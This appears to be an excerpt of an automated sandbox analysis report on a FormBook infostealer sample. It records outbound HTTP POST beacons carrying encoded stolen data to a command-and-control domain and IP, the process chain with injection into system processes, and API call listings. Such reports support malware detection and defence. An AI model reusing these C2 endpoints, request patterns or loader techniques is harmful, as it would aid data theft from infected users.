Jan 10, 2025 18:05:09.163453102 CET	817	OUT	POST /w7eo/ HTTP/1.1 Host: www.vilakodsiy.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.vilakodsiy.sbs Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 204 Referer: http://www.vilakodsiy.sbs/w7eo/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Data Raw: 67 6a 52 3d 78 35 4c 50 6c 37 68 77 65 38 48 5a 66 69 61 72 50 33 69 74 30 4e 49 36 6e 54 4b 37 31 4f 76 31 65 73 52 61 66 38 50 32 2b 35 6c 6e 37 71 45 38 41 4c 67 63 6e 72 78 77 30 72 34 63 35 37 35 47 54 38 73 48 4a 38 7a 39 71 49 4f 77 44 47 30 56 36 53 71 66 70 75 64 79 34 68 30 73 54 73 41 62 67 4d 58 52 53 53 79 4f 66 66 45 49 71 78 77 6f 74 5a 5a 33 4c 38 55 50 70 4f 5a 66 78 49 71 64 33 2b 59 76 56 70 42 2f 6d 44 78 32 78 70 4d 6a 4f 55 53 41 52 61 51 65 36 30 53 4e 4f 37 5a 36 70 55 6c 32 48 61 39 51 70 45 59 32 66 69 67 32 6f 63 6b 2f 2b 4a 58 52 6e 64 37 78 38 48 62 61 43 57 45 35 41 73 4d 3d Data Ascii: gjR=x5LPl7hwe8HZfiarP3it0NI6nTK71Ov1esRaf8P2+5ln7qE8ALgcnrxw0r4c575GT8sHJ8z9qIOwDG0V6Sqfpudy4h0sTsAbgMXRSSyOffEIqxwotZZ3L8UPpOZfxIqd3+YvVpB/mDx2xpMjOUSARaQe60SNO7Z6pUl2Ha9QpEY2fig2ock/+JXRnd7x8HbaCWE5AsM=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49988	104.21.64.1	80	2764	C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:05:11.716317892 CET	837	OUT	POST /w7eo/ HTTP/1.1 Host: www.vilakodsiy.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.vilakodsiy.sbs Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 224 Referer: http://www.vilakodsiy.sbs/w7eo/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Data Raw: 67 6a 52 3d 78 35 4c 50 6c 37 68 77 65 38 48 5a 5a 43 4b 72 41 77 4f 74 38 4e 49 39 6a 6a 4b 37 2b 75 76 78 65 73 64 61 66 34 33 6d 39 50 56 6e 36 4f 49 38 42 4a 49 63 75 37 78 77 37 4c 35 57 39 37 35 50 54 38 6f 31 4a 2b 6e 39 71 49 71 77 44 48 45 56 36 6a 71 63 6f 2b 64 30 6a 52 30 75 58 73 41 62 67 4d 58 52 53 53 6e 54 66 66 4d 49 71 42 41 6f 75 38 74 30 43 63 55 4f 2b 2b 5a 66 31 49 71 6e 33 2b 5a 41 56 74 59 71 6d 42 5a 32 78 72 55 6a 50 42 2b 44 66 71 51 63 30 55 53 65 4b 4b 68 32 6f 79 6c 6c 61 4a 59 44 34 6e 67 49 65 55 52 63 79 2b 73 58 74 70 37 70 33 4f 7a 47 74 33 36 7a 59 31 55 4a 65 37 62 69 37 46 4b 48 48 42 43 53 4b 6e 72 4b 32 4c 59 33 46 69 41 44 Data Ascii: gjR=x5LPl7hwe8HZZCKrAwOt8NI9jjK7+uvxesdaf43m9PVn6OI8BJIcu7xw7L5W975PT8o1J+n9qIqwDHEV6jqco+d0jR0uXsAbgMXRSSnTffMIqBAou8t0CcUO++Zf1Iqn3+ZAVtYqmBZ2xrUjPB+DfqQc0USeKKh2oyllaJYD4ngIeURcy+sXtp7p3OzGt36zY1UJe7bi7FKHHBCSKnrK2LY3FiAD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49989	104.21.64.1	80	2764	C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:05:14.286490917 CET	1854	OUT	POST /w7eo/ HTTP/1.1 Host: www.vilakodsiy.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.vilakodsiy.sbs Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 1240 Referer: http://www.vilakodsiy.sbs/w7eo/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Data Raw: 67 6a 52 3d 78 35 4c 50 6c 37 68 77 65 38 48 5a 5a 43 4b 72 41 77 4f 74 38 4e 49 39 6a 6a 4b 37 2b 75 76 78 65 73 64 61 66 34 33 6d 39 50 64 6e 37 37 55 38 4f 49 49 63 30 37 78 77 32 72 35 56 39 37 34 66 54 38 52 38 4a 2b 72 79 71 4f 75 77 46 68 34 56 34 52 53 63 6e 2b 64 30 72 78 30 72 54 73 41 72 67 4d 48 56 53 53 33 54 66 66 4d 49 71 43 59 6f 35 35 5a 30 41 63 55 50 70 4f 5a 44 78 49 72 49 33 2f 78 36 56 74 55 36 6e 78 35 32 77 4c 45 6a 44 58 4b 44 5a 36 51 61 33 55 54 44 4b 4c 63 6f 6f 79 52 58 61 49 74 59 34 6e 59 49 63 53 4a 66 6e 64 55 4f 2f 59 71 46 34 75 4b 6b 77 51 4b 6f 53 48 41 47 62 70 6a 6d 33 42 6d 55 45 47 65 75 4f 56 79 43 67 63 51 67 45 46 56 6c 73 46 36 33 65 55 62 5a 6d 67 72 4e 7a 43 72 4d 35 65 4f 51 4a 5a 46 5a 38 69 63 56 34 58 6e 34 56 57 62 46 30 56 57 32 5a 67 2b 74 35 34 6b 52 43 78 64 38 45 6f 47 75 34 38 59 6b 70 48 35 30 44 7a 45 65 4b 76 46 73 75 53 4c 4c 4e 70 44 71 59 4b 69 36 6b 37 67 2f 79 6c 6a 74 63 2b 56 39 67 79 63 70 36 39 70 45 62 44 4e 50 65 57 39 65 6f 4c [TRUNCATED] Data Ascii: gjR=x5LPl7hwe8HZZCKrAwOt8NI9jjK7+uvxesdaf43m9Pdn77U8OIIc07xw2r5V974fT8R8J+ryqOuwFh4V4RScn+d0rx0rTsArgMHVSS3TffMIqCYo55Z0AcUPpOZDxIrI3/x6VtU6nx52wLEjDXKDZ6Qa3UTDKLcooyRXaItY4nYIcSJfndUO/YqF4uKkwQKoSHAGbpjm3BmUEGeuOVyCgcQgEFVlsF63eUbZmgrNzCrM5eOQJZFZ8icV4Xn4VWbF0VW2Zg+t54kRCxd8EoGu48YkpH50DzEeKvFsuSLLNpDqYKi6k7g/yljtc+V9gycp69pEbDNPeW9eoLoIEJ5jeeHe3bx7c0GIU495sIXGapMRGH0Y2J2eszMoj2YG+QFjDyoKQ5irZph8mk/8lBOyolHAPFmdFGuk+IRQo5fXl7ZsCVspYGPqYm2JLaFDYarxFpYRxmZ5xG+gDhypt1+qkJyvywOK12q47dj5Bkw/NdF+MkvqpVaGMI5qEHl/ugySbkOv6nXxnhwCNtDXPQ2AkEn6NAvkRydS0znaUXiwkBDOjKv0r4ZQnjZ7OXgB6AJ3fg+ddahxKYFe7fh+uikdO/bmGmWd6y7dS/0tH29XnNApw2cvLpX5oYe6toDOVSrgPhkkLj4+L+Ahc4NXZd9171U7cXCLUIeIEmjB7qYQR7nr3gf/J9dasmBeDy0JYuDYS1ziDuw1X/zEoPo+c3bN3HM2I1VXY/ukNeeeowbsjb8BS3ABG33Du4oZnfJJUE7TdGn1jFBQhaSBXB2NH7kpSpFgSXf0h7msPHzYhh3Bajlb9UnvKRkQeiKcdrIMGEXF2tM/taytpSiSX9wknaDpIxoBZLtIMr/zQlEPHq4Yi03/yaDnVpPDDloL3cHTtDBd1rnx7/C0fZTiDEal1J2vWSc1NyLr78dQxMRY4coMmoxLXtYP4r6BNaOlohwkgcLC2LdFPtIyBbX3gyf/6QWhppyff4qnrJR7hWxHSZdz21skbVgh [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49990	104.21.64.1	80	2764	C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:05:16.827178955 CET	550	OUT	GET /w7eo/?gjR=87jvmPBkWfHORTeDIH6vw6Iilw+7ldDVauNTJPGD6Y0g6pEQO5IgtLUhmq8D9IsvGok6fcDnqazXOW08rDaond58uEkeXckhjfb1cCvnPNMW22V5tJ5baph3pqAG39XDrQ==&Fz=2jBhVn HTTP/1.1 Host: www.vilakodsiy.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30

Target ID:	0
Start time:	12:03:38
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\4sfN3Gx1vO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\4sfN3Gx1vO.exe"
Imagebase:	0x510000
File size:	1'245'696 bytes
MD5 hash:	F6F040A290CC9C41A1B07307F12310E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:03:41
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\4sfN3Gx1vO.exe"
Imagebase:	0x40000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2392864199.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2393158045.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2393615856.0000000003600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:04:05
Start date:	10/01/2025
Path:	C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe"
Imagebase:	0x700000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3315527275.0000000002930000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	12:04:06
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\prevhost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\prevhost.exe"
Imagebase:	0xe10000
File size:	24'064 bytes
MD5 hash:	79FED29A7F3DF4BA67599EFF3CDB4F1A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3314303554.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3315298026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3315173119.0000000004CC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	12:04:19
Start date:	10/01/2025
Path:	C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe"
Imagebase:	0x700000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	12:04:31
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	1.3%
Signature Coverage:	4.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	55

Executed Functions

Function 005142DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0051430D

Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A

GetCurrentProcess.KERNEL32(?,005ACB64,00000000,?,?), ref: 00514422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00514429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00514454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00514466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00514474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0051447B
GetSystemInfo.KERNEL32(?,?,?), ref: 005144A0

Strings

GetNativeSystemInfo, xrefs: 00514460
kernel32.dll, xrefs: 0051444F
|O, xrefs: 005536F8

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 9c8305d5dcf685a4b0f12ecb36f2286912806a6685b9f5acf30200da6524060d
Instruction ID: ac8a0bbb934b3f79df29d2195ded40d43c13280d5240523b76426081269d0183
Opcode Fuzzy Hash: 9c8305d5dcf685a4b0f12ecb36f2286912806a6685b9f5acf30200da6524060d
Instruction Fuzzy Hash: 7FA1E47190AAC0CFDB19C7697CC01D97FA57B3E780B285C99D4C59BA22D2704A4CEB39

Function 005142A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,005150AA,?,?,00000000,00000000), ref: 005142B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,005150AA,?,?,00000000,00000000), ref: 005142C9
LoadResource.KERNEL32(?,00000000,?,?,005150AA,?,?,00000000,00000000,?,?,?,?,?,?,00514F20), ref: 005535BE
SizeofResource.KERNEL32(?,00000000,?,?,005150AA,?,?,00000000,00000000,?,?,?,?,?,?,00514F20), ref: 005535D3
LockResource.KERNEL32(005150AA,?,?,005150AA,?,?,00000000,00000000,?,?,?,?,?,?,00514F20,?), ref: 005535E6

Strings

SCRIPT, xrefs: 005142BF

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 48154616b0d3bdbeceac9f668d8d361e85e1801ac70b02415dabd46cd6e3cbc2
Instruction ID: e5e0dc8853f89fc7c25ddc1ad19a9260f9aa9c733a047f7e9c79c4dffda4c798
Opcode Fuzzy Hash: 48154616b0d3bdbeceac9f668d8d361e85e1801ac70b02415dabd46cd6e3cbc2
Instruction Fuzzy Hash: B6117C78200701BFE7218B65DC48F677FBAFFD6B51F108169B41296250DB71D8449A20

Function 00552BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00512B6B

Part of subcall function 00513A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,005E1418,?,00512E7F,?,?,?,00000000), ref: 00513A78

Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,005D2224), ref: 00552C10
ShellExecuteW.SHELL32(00000000,?,?,005D2224), ref: 00552C17

Strings

runas, xrefs: 00552C0B

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: ad5ed4fc5e2c1d674b9ecde2a990335b996731b5878198f2e8ad687d85abe990
Instruction ID: f702cb7e64c365209b1356b3a388479cdc678667a0ed7ac8af206a66260bd42c
Opcode Fuzzy Hash: ad5ed4fc5e2c1d674b9ecde2a990335b996731b5878198f2e8ad687d85abe990
Instruction Fuzzy Hash: C411E7311083426AEB14FF20D8699FD7FA4BFE1351F04082EF182421A2CF318AC9D712

Function 0057DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00555222), ref: 0057DBCE
GetFileAttributesW.KERNELBASE(?), ref: 0057DBDD
FindFirstFileW.KERNELBASE(?,?), ref: 0057DBEE
FindClose.KERNEL32(00000000), ref: 0057DBFA

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: d667dd7003aae2d823655a1aedfb75caaccad058711674bbbda24ed44d2af4e7
Instruction ID: f0e16c42470e8858e4035df2d2e7cfdca5165d8050b9322c8c5084dd2548bc3d
Opcode Fuzzy Hash: d667dd7003aae2d823655a1aedfb75caaccad058711674bbbda24ed44d2af4e7
Instruction Fuzzy Hash: 36F0A0308109105783216B78AC0D8AA3FBCAF42334B108702F87AC20E0EBB05D58EAA5

Function 0051BF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON

Download Yara Rule

Strings

p#^, xrefs: 005607CE

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: BuffCharUpper
String ID: p#^
API String ID: 3964851224-2580200144
Opcode ID: d26ac5ccd41c4c41bcd5cf8e90c9f8f19bf679bcbdc6b5bcd267b5df6a4300ba
Instruction ID: 180d47d191b079c4de38bfffd8ad49dc2cea871e64a4e535c356fef6e14eddb3
Opcode Fuzzy Hash: d26ac5ccd41c4c41bcd5cf8e90c9f8f19bf679bcbdc6b5bcd267b5df6a4300ba
Instruction Fuzzy Hash: 0DA26B706083419FD714DF18C484B6ABFE1BF89304F14896DE89A9B392D772EC85CB92

Function 0051D730 Relevance: 21.6, APIs: 14, Instructions: 627windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0051D807
timeGetTime.WINMM ref: 0051DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0051DB28
TranslateMessage.USER32(?), ref: 0051DB7B
DispatchMessageW.USER32(?), ref: 0051DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0051DB9F
Sleep.KERNEL32(0000000A), ref: 0051DBB1

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 63f01a4a6094de267a4c1e910c2e38b244e20f792263150d8b94e3c66e3eb64b
Instruction ID: fd57dc7d5e94747b1b16466e0e835fa13b7976316c91f25d005dd059956decd9
Opcode Fuzzy Hash: 63f01a4a6094de267a4c1e910c2e38b244e20f792263150d8b94e3c66e3eb64b
Instruction Fuzzy Hash: EE42C5706087429FE728CF24C888BAABFF4BF95304F14495DE4958B291D774E884DFA2

Function 00512CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00512D07
RegisterClassExW.USER32(00000030), ref: 00512D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00512D42
InitCommonControlsEx.COMCTL32(?), ref: 00512D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00512D6F
LoadIconW.USER32(000000A9), ref: 00512D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00512D94

Strings

AutoIt v3 GUI, xrefs: 00512D23
TaskbarCreated, xrefs: 00512D37
0, xrefs: 00512CE9
+, xrefs: 00512CF0

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 05a03a51e42841c1cd0665a3e8ae9cb0c71c7fa4468e5983488920ca7cf30ad6
Instruction ID: f143d0c6b0c80f3b561a8e98a00846a8f3dcc9a9066f4841c4aa78f998568ed5
Opcode Fuzzy Hash: 05a03a51e42841c1cd0665a3e8ae9cb0c71c7fa4468e5983488920ca7cf30ad6
Instruction Fuzzy Hash: F021E3B5901258AFDB00DFA4E889BDDBFB4FB19700F00811AF551EA2A0D7B50548EFA4

Function 00548D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.S, xrefs: 0054903A, 00548FD0, 00548FF2

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID: .S
API String ID: 0-1539595904
Opcode ID: f4084f31dbfe58e50bcc5b216dca1cda73154b838ff3e5d66c7742d360502bd2
Instruction ID: 4df9f2ad0d55cb23b9e7b728096982678500be7613d02536fa81326fd622d9b8
Opcode Fuzzy Hash: f4084f31dbfe58e50bcc5b216dca1cda73154b838ff3e5d66c7742d360502bd2
Instruction Fuzzy Hash: ABC1E174D04249AFDB15DFA8D84ABEEBFB0BF59318F044099F418AB392C7709941CB61

Function 0055065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0055039A: CreateFileW.KERNELBASE(00000000,00000000,?,00550704,?,?,00000000,?,00550704,00000000,0000000C), ref: 005503B7

